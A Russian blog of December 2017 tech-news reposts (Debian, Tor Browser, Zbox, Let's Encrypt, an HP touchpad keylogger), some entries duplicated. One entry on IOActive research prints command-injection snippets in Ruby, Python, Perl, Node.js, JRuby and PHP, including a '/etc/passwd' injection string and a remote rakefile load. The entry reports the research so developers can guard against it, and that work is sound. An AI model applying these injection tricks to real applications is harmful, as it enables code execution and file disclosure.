понедельник, 11 декабря 2017
10:27

Обновления Debian: 9.3 и 8.10

И это всё МОЁ

Проект Debian сообщает о третьем обновлении своего стабильного выпуска Debian 9 (кодовое имя «stretch»;) и десятом обновлении своего предыдущего стабильного выпуска Debian 8 (кодовое имя «jessie»;). В обновлениях присутствуют исправления пакетов для стабильности и безопасности ПО.

>>> Подробности про выпуск 8.10








 , ,








URL
10:26

Компании Intel и Hyper представили проект Kata Containers

И это всё МОЁ
Компании Intel и Hyper объединили свои разработки и представили проект Kata Containers, в рамках которого сделан следующий шаг в развитии технологий Clear Containers и runV, нацеленных на организацию выполнения изолированных контейнеров при помощи полноценных механизмов виртуализации. Развитие проекта будет курировать независимая организация OpenStack Foundation. О поддержке нового проекта уже заявили компании 99cloud, AWcloud, Canonical, China Mobile, City Network, CoreOS, Dell/EMC, EasyStack, Fiberhome, Google, Huawei, JD.com, Mirantis, NetApp, Red Hat, SUSE, Tencent, Ucloud, UnitedStack и ZTE. Код опубликован под лицензией Apache 2.0.



URL
04:51

Языковые пакеты становятся недоступными после обновления до Windows 8.1 с Windows 8

И это всё МОЁ
Обсуждается, что ранее установленных языковых пакетов становятся недоступными после обновления до Windows 8 для Windows 8.1. Предоставляет разрешение.



URL
04:51

Языковые пакеты становятся недоступными после обновления до Windows 8.1 с Windows 8

И это всё МОЁ
Обсуждается, что ранее установленных языковых пакетов становятся недоступными после обновления до Windows 8 для Windows 8.1. Предоставляет разрешение.



URL
04:51

Языковые пакеты становятся недоступными после обновления до Windows 8.1 с Windows 8

И это всё МОЁ
Обсуждается, что ранее установленных языковых пакетов становятся недоступными после обновления до Windows 8 для Windows 8.1. Предоставляет разрешение.



URL
04:51

Языковые пакеты становятся недоступными после обновления до Windows 8.1 с Windows 8

И это всё МОЁ
Обсуждается, что ранее установленных языковых пакетов становятся недоступными после обновления до Windows 8 для Windows 8.1. Предоставляет разрешение.



URL
02:31

Запись за 11.12.2017 01:31:10 +0200

И это всё МОЁ
www.kernel.org/
Greg Kroah-Hartman, мэйнтэйнер стабильных версий ядра Linux представил очередные обновления с исправлениями багов и проблем с безопасностью.

Linux-lts 4.14.5:
cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-...

The Linux Kernel Archives



URL
00:22

Запись за 10.12.2017 23:22:31 +0200

И это всё МОЁ
Обновление web-браузера Tor Browser 7.0.11.

Проект Tor опубликовал выпуск специализированного браузера Tor Browser 7.0.11, ориентированного на обеспечение анонимности, безопасности и приватности. Новый выпуск дистрибутива Tails задерживается. Браузер построен на кодовой базе Firefox и отличается тем, что весь трафик перенаправляется только через сеть Tor.

Обратиться напрямую через штатное сетевое соединение текущей системы невозможно, что не позволяет отследить реальный IP пользователя (в случае компрометации браузера, атакующие могут получить доступ к системным параметрам сети, поэтому для полного блокирования возможных утечек следует использовать такие продукты, как sandboxed-tor-browser и Whonix). Сборки Tor Browser подготовлены для GNU/Linux, Windows и macOS.

Для обеспечения дополнительной защиты в состав входит дополнение HTTPS Everywhere, позволяющее использовать шифрование трафика на всех сайтах где это возможно. Для снижения угрозы от проведения атак с использованием Javasсript и блокирования по умолчанию плагинов в комплекте поставляется дополнение NoScript. Для борьбы с блокировкой и инспектированием трафика применяется fteproxy. Для организации шифрованного канала связи в окружениях, блокирующих любой трафик кроме HTTP, предлагаются альтернативные транспорты, которые, например, позволяют обойти попытки блокировать Tor.

В новом выпуске осуществлена синхронизация с выпуском Firefox 52.5.2 ESR, в котором устранена критическая уязвимость, проявляющаяся на платформе Windows (переполнение буфера при отрисовке при помощи библиотеки ANGLE через Direct 3D 9). Также устранена менее опасная уязвимость, которая позволяет осуществить запись в хранилище IndexedDB из Web worker, запущенном в режиме Private Browsing. Пакет Tor обновлён до выпуска 0.3.1.9, в котором устранено пять уязвимостей. В состав включены новые версии дополнений HTTPS-Everywhere 2017.12.6 и NoScript 5.1.8.1.

Обновление web-браузера Tor Browser 7.0.11



URL
00:16

Запись за 10.12.2017 23:16:36 +0200

И это всё МОЁ
Первый выпуск файловой системы Zbox.

Доступен первый выпуск новой файловой системы Zbox, ориентированной на обеспечение конфиденциальности хранения данных в приложениях. Код Zbox написан на языке Rust и распространяется под лицензией Apache 2.0. Проект находится на стадии активной разработки, поэтому стабильность пока не гарантируется.

Zbox относится к категории встраиваемых ФC, предоставляющих слой для шифрованного доступа к файлам на уровне приложения. Подобный подход требует специальной адаптации программ для работы с Zbox, но избавляет от необходимости установки компонентов ФС в операционной системе и защищает канал передачи данных между приложением и операционной системой.

Zbox осуществляет хранение данных в форме зашифрованного репозитория, доступ к которому могут получить только авторизированные приложения, которые могут работать с содержимым Zbox как с традиционной файловой системой. Для остального мира хранилище Zbox представляет собой черный ящик. Хранилище не обеспечивает совместный доступ для разных процессов - каждый экземпляр Zbox работает только в адресном пространстве приложения, в каждый момент времени операции с ФС может выполнять только один процесс. Для хранения репозитория Zbox может использоваться как любые штатные системные ФС, так и оперативная память, СУБД и NoSQL-хранилища в формате ключ-значение (поддержка ожидается в будущих выпусках).

Основные возможности:

Полное шифрование информации, включая метаданные и структуру каталогов;
Применение для шифрования и хэширования алгоритмов AES-256-GCM (hardware), XChaCha20-Poly1305 и Argon2 в реализации библиотеки libsodium;
Поддержка дедупликации повторяющихся данных как на уровне содержимого отдельных блоков, так и на уровне целых файлов;
Сжатие данных с использованием алгоритма LZ4;
Гарантирование целостности данных, благодаря применению методов аутентифицированного шифрования (AEAD);
Поддержка снапшотов;
Версионирование содержимого файлов;
Семантика в режиме Copy-on-write (COW);
Соответствие транзакций требованиям ACID;
Возможность работы поверх различных типов нижележащих хранилищ и СУБД;
Реализация на языке Rust, предоставляющем средства для безопасной работы с памятью.
Сравнение с системами шифрования на уровне диска (VeraCrypt) и ОС (EncFS, APFS, ZFS):


Первый выпуск файловой системы Zbox



URL
00:12

Запись за 10.12.2017 23:12:05 +0200

И это всё МОЁ
Google адаптировала Mesa 17.1 для своей новой экспериментальной ОС Fuchsia (Фуксия), которая может стать заменой Android и используемого в Android ядра Linux.

github.com/fuchsia-mirror/third_party-mesa/comm...
Mesa — это используемая в Linux, *BSD и иногда в Android программа, включающая в себя графические драйверы для видеокарт; так, например, Intel и AMD обеспечивают первоклассную поддержку работы своих видеокарт на Linux/Android благодаря написанию кода Mesa в апстриме, в последнее время это делает и Broadcom для своих мобильных видеокарт.
В репозитории Fuchsia лежит форк Mesa из какого-то репозитория AMD, судя по README. Это значит, что, если операционная система Fuchsia получит распространение и AMD, Intel и другие корпорации (быть может, Nvidia) захотят, чтобы их видеокарты работали на мобильных устройствах, пользователи Linux на декстопах и мобильных устройствах автоматически получат намного лучше работающую видеокарту, ведь Mesa общая среди Fuchsia и Linux (надеюсь, что Google не будет поддерживать свой сильно отличающийся от апстрима форк Mesa).

Merge mesa 17.1 · fuchsia-mirror/third_party-mesa@c1015c8



URL
воскресенье, 10 декабря 2017
09:12

Запись за 10.12.2017 08:12:00 +0200

И это всё МОЁ
Сравнение производительности видеокарт NVIDIA GeForce (проприетарный драйвер 387.34) и AMD Radeon (ядро Linux 4.15 и Mesa 17.4-dev) в играх на Linux.

Видеокарты: NVIDIA GeForce GTX 1060, GTX 1070, GTX 1070 Ti, GTX 1080 и GTX 1080 Ti; AMD Radeon RX 580, R9 Fury, RX Vega 56 и RX Vega 64.

Игры: BioShock Infinite, Counter-Strike: Global Offensive, Deus Ex: Mankind Divided, Dota 2, Dawn of War III, F1 2017, Mad Max, Metro: Last Light Redux, Serious Sam 3: BFE и The Talos Principle.
Сравнение на сайте, кликни на картинку



URL
07:18

Первый выпуск файловой системы Zbox

И это всё МОЁ
Доступен первый выпуск новой файловой системы Zbox, ориентированной на обеспечение конфеденциальности хранения данных в приложениях. Zbox относится к категории встраиваемых ФC, предоставляющий слой для шифрованного доступа к файлам на уровне приложения. Подобный подход требует специальной адаптации программ для работы с Zbox, но избавляет от необходимости установки компонентов ФС в операционной системе и защищает канал передачи данных между приложением и операционной системой. Код Zbox написан на языке Rust и распространяется под лицензией Apache 2.0. Проект находится на стадии активной разработки, поэтому стабильность пока не гарантируется.



URL
06:51

Обновление web-браузера Tor Browser 7.0.11

И это всё МОЁ
Проект Tor опубликовал выпуск специализированного браузера Tor Browser 7.0.11, ориентированного на обеспечение анонимности, безопасности и приватности. Новый выпуск дистрибутива Tails задерживается. Браузер построен на кодовой базе Firefox и отличается тем, что весь трафик перенаправляется только через сеть Tor. Обратиться напрямую через штатное сетевое соединение текущей системы невозможно, что не позволяет отследить реальный IP пользователя (в случае компрометации браузера, атакующие могут получить доступ к системным параметрам сети, поэтому для полного блокирования возможных утечек следует использовать такие продукты, как sandboxed-tor-browser и Whonix). Сборки Tor Browser подготовлены для Linux, Windows и macOS.



URL
00:17

Запись за 09.12.2017 23:17:39 +0200

И это всё МОЁ
Неявные свойства языков программирования, которые могут привести к уязвимостям.

Исследователи из компании IOActive представили на конференции Black Hat Europe доклад, в котором подвели итоги работы по выявлению недокументированной функциональности в интерпретируемых языках программирования, которая может потенциально стать причиной появления уязвимостей в приложениях. Код разработанного в рамках исследования инструментария ZDiFF (Extended Differential Fuzzing Framework), который применялся для выявления потенциальных уязвимостей, опубликован под лицензией GPLv3.

Примером подобной функциональности, который подтолкнул к проведению исследования, является давно известная особенность открытия ссылок через функцию open() в языке Ruby. При передаче URL в качестве аргумента, данная функция позволяет загрузить удалённую страницу, чем пользуются многие разработчики. При этом не все учитывают, что при отсутствии надлежащей проверки (например, через "/^https:/"), вместо URL может быть передана конструкция вида "|head /etc/passwd;\nurl.com", которая приведёт к выполнению кода в системе.

Проведя fuzzing-тестирование стандартных наборов библиотек популярных языков программирования была выявлена серия недокументированных особенностей в Python, Perl, Node.js, JRuby и PHP, которые сами по себе не являются уязвимостями, но могут стать источником их появления в приложениях:

Недокументированный способ выполнения кода в Python, используя метод pipeto() в библиотеке mimetool, метод pipepager в библиотеке pydoc или манипулируя переменной окружения PAGER при выполнении метода pager в pydoc. Например, для выполнения программы id можно использовать

import mimetools
print(mimetools.pipeto(None,'id'))

или
import pydoc
print(pydoc.pipepager(None,'id')

или
$ export PAGER="id> bar"
$ python -c "import pydoc;pydoc.pager('foo')"
Локальное выполнение кода в программах на языке Perl, использующих функцию embeddable_typemap() из модуля "ExtUtils::Typemaps::Cmd" для загрузки XS typemap, которая имеет неприятную особенность исполнения аргумента как Perl-кода в случае ошибки. Для выполнения программы id можно использовать код (параметр функции embeddable_typemap будет выполнен через eval и результат показан в составе сообщения об ошибке):

use ExtUtils::Typemaps::Cmd;
print embeddable_typemap("system 'id'");
Утечка данных из файла в составе сообщения об ошибке в Node.JS. При возможность контролировать имена модулей, загружаемых через вызов require(), в случае попытки загрузки не Javasсript-файла буде сгенерирован SyntaxError, но при использовании Javasсript-движка V8 в составе текста ошибки будет выдано содержимое первой строки файла. Например, попытка выполнить "console.log(require('.htpasswd'))" приведёт к выводу содержимого первой строки файла.htpasswd в тексте ошибки.
Возможность выполнения кода в программах JRuby, использующих класс Rake. Напрмер, для выполнения команды id можно разместить на внешнем сайте файл x.x.x.x/canaryfile с содержимым "пустая строка puts %x(id)" и инициировать обработку ссылки x.x.x.x/canaryfile в функции load_rakefile:

require "rake";
puts Rake.load_rakefile("x.x.x.x/canaryfile");
Выполнение команд в коде на PHP, использующем неопределённые константы, которые интерпретируются как строки. В случае если константы определяются в одном файле, а использующие их вызов в другом, можно напрямую обратиться ко второму файлу и вместо содержимого константы значение будет обработано как строковое имя константы. Например:

echo shell_exec(escapeshellcmd(bash." -c id"));
приведёт к выполнению "bash -c id", хотя по задумке разработчиков в константе bash могли передаваться другие данные.
Неявные свойства языков программирования, которые могут привести к уязвимостям



URL
суббота, 09 декабря 2017
22:49

Запись за 09.12.2017 21:49:13 +0200

И это всё МОЁ
NVIDIA 387.34 vs. Linux 4.15 + Mesa 17.4-dev Radeon, OpenGL/Vulkan.
Тесты производительности на GNU/Linux.
NVIDIA 387.34 vs. Linux 4.15 + Mesa 17.4-dev Radeon OpenGL/Vulkan Performance - Phoronix



URL
22:47

Запись за 09.12.2017 21:47:38 +0200

И это всё МОЁ
Проект Let's Encrypt опубликовал планы на 2018 год.

Некоммерческий удостоверяющий центр Let’s Encrypt, контролируемый сообществом и предоставляющий сертификаты безвозмездно всем желающим, опубликовал сообщение, обобщающее итоги 2017 года и рассказывающее о планах на следующий год. В 2017 году доля запросов страниц по HTTPS увеличилось с 46% до 67%. Проектом Let's Encrypt выдано 46 млн сертификатов, охватывающих около 61 млн доменов, что составляет примерно 37% от всех выданных сертификатов. В следующем году Let’s Encrypt намерен удвоить показатели и довести число выданных сертификатов до 90 млн, а число охваченных доменов до 120 млн.

В 2018 году также планируется представить вторую версию протокола ACME и обеспечить возможность использования сертификатов, охватывающих группу поддоменов по маске (например, *.example.com). Сертификаты с масками можно будет генерировать начиная с 4 января 2018 года, в рамках начала тестирования API ACMEv2. Полноценный запуск нового API и масок запланирован на 27 февраля. Позднее в 2018 году планируется ввод в эксплуатацию корневого и промежуточных сертификатов, созданных с использованием алгоритма ECDSA, более эффективного, чем ныне используемый RSA.

Текущая серверная инфраструктура Let's Encrypt обрабатывает примерно 2 миллиарда запросов в день. Оборудование размещено в двух датацентрах и все используемые серверы, хранилища, HSM, коммутаторы и межсетевые экраны занимают 70 юнитов в стойках. В следующем году для увеличения производительности и экономии энергии планируется заменить 10 серверов, занимающих по 2 юнита (2u), на 20 одноюнитовых серверов (1u).

Работу сервиса обеспечивают 5 постоянно трудоустроенных сотрудников, в 2018 году планируется нанять ещё одного человека. Запланированный бюджет на 2018 год составит 3 млн долларов, что всего на 13% больше, чем бюджет 2017 года. Средства собираются в основном за счёт финансовой помощи от крупных спонсоров, таких как Mozilla, Akamai, OVH, Cisco, Google, Electronic Frontier Foundation, IdenTrust, Ford Foundation и Internet Society.
Проект Let's Encrypt опубликовал планы на 2018 год



URL
22:40

Запись за 09.12.2017 21:40:26 +0200

И это всё МОЁ
В ноутбуках HP снова обнаружен кейлоггер.

Проблемный код присутствовал в файле SynTP.sys, являющемся частью драйвера Synaptics Touchpad.

Компания HP выпустила обновление для драйверов в сотнях моделей ноутбуков, удаляющее код для отладки, который мог использоваться злоумышленниками как кейлоггер. Проблемный код присутствовал в файле SynTP.sys, являющемся частью драйвера Synaptics Touchpad.
Эту проблему можно было изначально избежать если вместо Windows сразу же установить GNU/Linux.

Проблему обнаружил исследователь безопасности под псевдонимом ZwClose. «Регистрация нажатий клавиш отключена по умолчанию, однако ее можно включить, внеся изменения в значения реестра», - пояснил исследователь. Речь идет о модификации ключа реестра HKLM\Software\Synaptics\%ProductName% HKLM\Software\Synaptics\%ProductName%\Default. С его помощью злоумышленники могут активировать функцию кейлоггера и следить за жертвами, используя «родные» инструменты системы и оставаясь незамеченными для решений безопасности. Нужно лишь обойти контроль учетных записей пользователя (UAC) при модифицировании реестра ключа.

Как пояснил ZwClose, сканированные коды кейлоггер сохраняет в WPP. Инструмент WPP разработан Microsoft и предназначен для отладки и трассирования кода в процессе разработки. Исследователь сообщил HP о своей находке, и компания выпустила исправление.

Напомним, в продуктах HP кейлоггер обнаруживается уже не в первый раз. В мае нынешнего года встроенный кейлоггер был выявлен в 20 моделях ноутбуков производства компании. В конце прошло месяца производитель также был обвинен в скрытой установке на свои устройства шпионского ПО.
zwclose.github.io/HP-keylogger/
www.securitylab.ru/news/486117.php
www.securitylab.ru/news/489900.php
В ноутбуках HP снова обнаружен кейлоггер



URL
21:07

Неявные свойства языков программирования, которые могут привести к уязвимостям

И это всё МОЁ
Исследователи из компании IOActive представили на конференции Black Hat Europe доклад, в котором подвели итоги работы по выявлению недокументированной функциональности в интерпретируемых языках программирования, которая может потенциально стать причиной появления уязвимостей в приложениях. Код разработанного в рамках исследования инструментария ZDiFF (Extended Differential Fuzzing Framework), который применялся для выявления потенциальных уязвимостей, опубликован под лицензией GPLv3.



URL
19:15

Запись за 09.12.2017 18:15:06 +0200

И это всё МОЁ
Релиз дистрибутива Debian 9.3, содержащий обновления и исправления ошибок
Debian 9.3



URL
18:52

Проект Let's Encrypt опубликовал планы на 2018 год

И это всё МОЁ
Некоммерческий удостоверяющий центр Let’s Encrypt, контролируемый сообществом и предоставляющий сертификаты безвозмездно всем желающим, опубликовал сообщение, обобщающее итоги 2017 года и рассказывающее о планах на следующий год. В 2017 году доля запросов страниц по HTTPS увеличилось с 46% до 67%. Проектом Let's Encrypt выдано 46 млн сертификатов, охватывающих около 61 млн доменов, что составляет примерно 37% от всех выданных сертификатов. В следующем году Let’s Encrypt намерен удвоить показатели и довести число выданных сертификатов до 90 млн, а число охваченных доменов до 120 млн.



URL